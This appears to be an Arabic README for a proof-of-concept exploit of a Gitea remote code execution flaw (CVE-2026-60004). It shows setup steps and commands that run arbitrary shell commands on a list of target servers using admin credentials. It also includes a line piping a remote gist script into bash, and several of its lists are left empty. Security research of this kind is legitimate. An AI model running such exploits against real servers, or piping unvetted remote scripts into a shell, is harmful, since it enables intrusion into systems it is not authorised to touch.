
CVE-2026-60004
المزيد: https://github.com/go-gitea/gitea/security/advisories/GHSA-rcr6-4jqh-j84m
ادعم صيانة هذا المشروع عبر PayPal أو بمسح رمز الاستجابة السريعة أدناه.
استخدم هذا المشروع فقط في بيئات آمنة ومصرح بها مثل:
مثال على الإعداد:
git clone <repository-url>
cd <repository-name>
# Project use python follow below
# Create a virtual environment
python -m venv venv
# Activate the virtual environment
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Install requirments
pip install -r requirements.txt
مثال على الاستخدام:
# 1. Optional global password for lines that omit it
export GITEA_PASSWORD='defaultpass'
# 2. Run (safe first)
python3 gitea_diffpatch_rce_poc.py --targets targets.txt -c 'id' --dry-run
# 3. Real run with 3 workers
python3 gitea_diffpatch_rce_poc.py --targets targets.txt -c 'id; uname -srm; pwd' -w 3
# 4. Classic single-target still works
python3 gitea_diffpatch_rce_poc.py http://127.0.0.1:3000 admin 'id'
ملاحظة:
curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y لمسح مجلد .git المتداخلمستودع لتعلّم واختبار وبحث مفاهيم الأمن السيبراني في بيئات خاضعة للتحكم.
هذا المستودع مخصص لأغراض البحث الأمني التعليمي والمصرح به فقط.
إنه مصمم لمساعدة المستخدمين على التعرف على:
استخدم هذا المستودع فقط في البيئات التي لديك إذن لاستخدامها، مثل:
الاستخدام غير المصرح به أو غير القانوني محظور تمامًا.
المؤلف والمساهمون غير مسؤولين عن أي ضرر أو إساءة استخدام أو مشكلات قانونية أو خسائر ناتجة عن هذا المشروع.
باستخدام هذا المستودع، فإنك توافق على أن:
هذا المشروع مخصص لـ:
يرجى اتباع ممارسات الإفصاح المسؤول والامتثال لجميع القوانين المعمول بها.
للإفصاح المسؤول أو التعاون، تواصل مع مُشرف المستودع عبر GitHub.